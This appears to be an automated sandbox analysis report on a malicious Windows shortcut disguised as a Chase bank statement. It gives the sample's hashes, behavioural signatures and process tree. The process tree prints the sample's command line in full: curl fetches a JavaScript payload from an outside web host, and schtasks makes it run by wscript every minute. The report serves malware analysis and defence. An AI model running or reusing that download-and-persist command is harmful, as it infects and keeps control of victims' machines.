Analysis
-
max time kernel
132s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
06-06-2024 13:33
Static task
static1
Behavioral task
behavioral1
Sample
Chasebank_Statement_May.lnk
Resource
win7-20240508-en
5 signatures
150 seconds
General
-
Target
Chasebank_Statement_May.lnk
-
Size
2KB
-
MD5
6bef4f06938cf2569a3ad26a9827269a
-
SHA1
e9a2dbcf2bf6bead0f46c60b7b8b5ffcf0dcfc50
-
SHA256
22ce45aa4ec31f4937872fb15d6ae787168c0f5a8399f514dd69e4eecbdc075c
-
SHA512
989181fdb9e591f113d54e18c31f093f681b9b30b3651d06c81fd202a51735079b8fe90f5bc708428ec973eefcf83ea7b3e982786d7c19a19d1512965c739b9c
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.execmd.exetaskeng.exedescription pid process target process PID 1688 wrote to memory of 2916 1688 cmd.exe cmd.exe PID 1688 wrote to memory of 2916 1688 cmd.exe cmd.exe PID 1688 wrote to memory of 2916 1688 cmd.exe cmd.exe PID 2916 wrote to memory of 2352 2916 cmd.exe schtasks.exe PID 2916 wrote to memory of 2352 2916 cmd.exe schtasks.exe PID 2916 wrote to memory of 2352 2916 cmd.exe schtasks.exe PID 2716 wrote to memory of 3020 2716 taskeng.exe wscript.EXE PID 2716 wrote to memory of 3020 2716 taskeng.exe wscript.EXE PID 2716 wrote to memory of 3020 2716 taskeng.exe wscript.EXE PID 2716 wrote to memory of 1640 2716 taskeng.exe wscript.EXE PID 2716 wrote to memory of 1640 2716 taskeng.exe wscript.EXE PID 2716 wrote to memory of 1640 2716 taskeng.exe wscript.EXE PID 2716 wrote to memory of 632 2716 taskeng.exe wscript.EXE PID 2716 wrote to memory of 632 2716 taskeng.exe wscript.EXE PID 2716 wrote to memory of 632 2716 taskeng.exe wscript.EXE -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Chasebank_Statement_May.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -s -v -o HYgncxmQatsP.js "https://www.dsestimation.com/wp-content/uploads/2015/10/azoxyphenetole04.php" & schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js' eTs6LGHd8vSKWwb" /tn eTs6LGHd8vSKWwb2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js' eTs6LGHd8vSKWwb" /tn eTs6LGHd8vSKWwb3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {E12D3FBA-7C65-4EF6-9862-72EDC6EA5EE9} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js" eTs6LGHd8vSKWwb2⤵
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js" eTs6LGHd8vSKWwb2⤵
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js" eTs6LGHd8vSKWwb2⤵